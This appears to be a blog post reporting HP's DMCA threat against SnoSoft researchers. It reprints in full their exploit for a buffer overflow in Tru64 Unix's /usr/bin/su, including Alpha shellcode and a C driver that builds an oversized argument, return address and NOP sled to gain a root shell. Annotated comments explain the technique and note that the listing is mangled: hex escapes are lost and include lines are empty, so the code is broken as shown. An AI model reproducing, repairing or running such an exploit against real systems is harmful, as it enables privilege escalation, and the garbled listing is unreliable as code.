CNET is reporting that Hewlett-Packard is using the DMCA to threaten a team of researchers who published information about a buffer overflow vulnerability in HP's Tru64 Unix operating system. A researcher at SnoSoft posted a link to the source code via SecurityFocus.com's Bugtraq mailing list.
In his letter to SnoSoft, Kent Ferson, Vice President of HP's UNIX Systems Unit, claims that SnoSoft is violating the DMCA as well as the Computer Fraud and Abuse Act. For research purposes, I post the source code below so that users may see what a buffer overflow is.
The source code to this exploit almost seems routine, in the sense that it is the traditional buffer overflow. Buffer overflows occur when a program writes data beyond the end of a buffer. While a simple buffer overflow will merely cause a segmentation fault, carefully crafted input can fill the buffer far enough to overwrite the program's saved instruction pointer, the value that tells the program what to execute next. How does this program overwrite that pointer and tell the computer what to do next? It injects machine code into the buffer by way of the shellcode[] array. The implementation is below.
/*
/bin/su tru64 5.1
works with non-exec stack enabled
stripey is the man
developed at http://www.snosoft.com in the cerebrum labs
phased
phased at mail.ru
*/
#include
#include
#include
#include
/*
 * Machine-code payload that main() places in the second argv string it hands
 * to su. The trailing comment on each line gives the intended Alpha mnemonic
 * for that 4-byte group.
 *
 * NOTE(review): as reproduced on this page the string escapes are mangled —
 * each group reads as plain text such as "x30x15xd9x43" rather than as hex
 * byte escapes — so this listing does not actually encode the instructions
 * the comments describe, and sizeof(shellcode) below counts the text as
 * written (plus its terminating NUL). It is kept verbatim as a teaching
 * artefact illustrating the shape of a stack-smashing payload, not as
 * buildable code.
 */
char shellcode[]=
"x30x15xd9x43" /* subq $30,200,$16 */
"x11x74xf0x47" /* bis $31,0x83,$17 */
"x12x14x02x42" /* addq $16,16,$18 */
"xfcxffx32xb2" /* stl $17,-4($18) */
"x12x94x09x42" /* addq $16,76,$18 */
"xfcxffx32xb2" /* stl $17,-4($18) */
"xffx47x3fx26" /* ldah $17,0x47ff($31) */
"x1fx04x31x22" /* lda $17,0x041f($17) */
"xfcxffx30xb2" /* stl $17,-4($16) */
"xf7xffx1fxd2" /* bsr $16,-32 */
"x10x04xffx47" /* clr $16 */
"x11x14xe3x43" /* addq $31,24,$17 */
"x20x35x20x42" /* subq $17,1,$0 */
"xffxffxffxff" /* callsys ( disguised ) */
"x30x15xd9x43" /* subq $30,200,$16 */
"x31x15xd8x43" /* subq $30,192,$17 */
"x12x04xffx47" /* clr $18 */
"x40xffx1exb6" /* stq $16,-192($30) */
"x48xffxfexb7" /* stq $31,-184($30) */
"x98xffx7fx26" /* ldah $19,0xff98($31) */
"xd0x8cx73x22" /* lda $19,0x8cd0($19) */
"x13x05xf3x47" /* ornot $31,$19,$19 */
"x3cxffx7exb2" /* stl $19,-196($30) */
"x69x6ex7fx26" /* ldah $19,0x6e69($31) */
"x2fx62x73x22" /* lda $19,0x622f($19) */
"x38xffx7exb2" /* stl $19,-200($30) */
"x13x94xe7x43" /* addq $31,60,$19 */
"x20x35x60x42" /* subq $19,1,$0 */
"xffxffxffxff"; /* callsys ( disguised ) */
/* shellcode by Taeho Oh */
/*
 * Builds two oversized argv strings and hands them to /usr/bin/su via execl().
 *
 *   buffer  - 8233 filler bytes (0x41, 'A') followed by the five bytes listed
 *             under the "0x140010401" comment. The writes stop at index 8237,
 *             so the last element of the 8239-byte array keeps the 0 written
 *             by bzero() and the string stays NUL-terminated.
 *   payload - 15000 bytes made of the first four bytes of `nop`, repeated,
 *             followed by the whole shellcode array (sizeof, so its
 *             terminating NUL is copied as well; 15000 + sizeof(shellcode)
 *             fits in the 15200-byte array).
 *
 * This is the classic stack-smashing shape the introduction describes: an
 * argument far longer than the fixed-size local buffer the target copies it
 * into, so the bytes past the end reach the saved return address. The fix
 * belongs on the target side — bound every copy of argv data to the
 * destination size and build privileged binaries with stack protection; on
 * the detection side, unusually long argv strings handed to a setuid binary
 * are a useful audit signal.
 *
 * Review notes on the code as written (kept byte-identical here):
 *   - main() has no return type (implicit int, invalid since C99) and never
 *     returns a value.
 *   - bzero() takes a void *; &buffer / &payload are pointer-to-array and
 *     only work because the address coincides — plain buffer / payload is
 *     the intended spelling.
 *   - The printf() format strings contain literal line breaks on this page,
 *     presumably "\n" escapes lost in extraction, and "%db" prints the byte
 *     count followed by a literal 'b'.
 *   - execl()'s argument list must end in a null pointer; a bare 0 is not
 *     portable where int and char * differ in size — (char *)0 is correct.
 *   - The string escapes in `nop` are mangled the same way as in shellcode,
 *     so the copied bytes are not the instruction the name suggests.
 */
main(int argc, char *argv[]) {
int i, j;
char buffer[8239];
char payload[15200];
char nop[] = "x1fx04xffx47"; /* only nop[0..3] are used below */
bzero(&buffer, 8239);
bzero(&payload, 15200);
for (i=0;i<8233;i++)
buffer[i] = 0x41;
/* 0x140010401 */
/* the five bytes below spell that value least-significant byte first */
buffer[i++] = 0x01;
buffer[i++] = 0x04;
buffer[i++] = 0x01;
buffer[i++] = 0x40;
buffer[i++] = 0x01;
/* 3750 copies of nop[0..3]; i is 15000 when this loop exits */
for (i=0;i<15000;) {
for(j=0;j<4;j++) {
payload[i++] = nop[j];
}
}
/* "i=i" is a no-op: the copy continues at payload[15000] */
for (i=i,j=0;j<sizeof(shellcode);i++,j++)
payload[i] = shellcode[j];
printf("/bin/su by phased
");
printf("payload %db
", strlen(payload));
printf("buffer %db
", strlen(buffer));
/* replaces this process with su; only returns if execl() itself fails */
execl("/usr/bin/su", "su", buffer, payload, 0);
}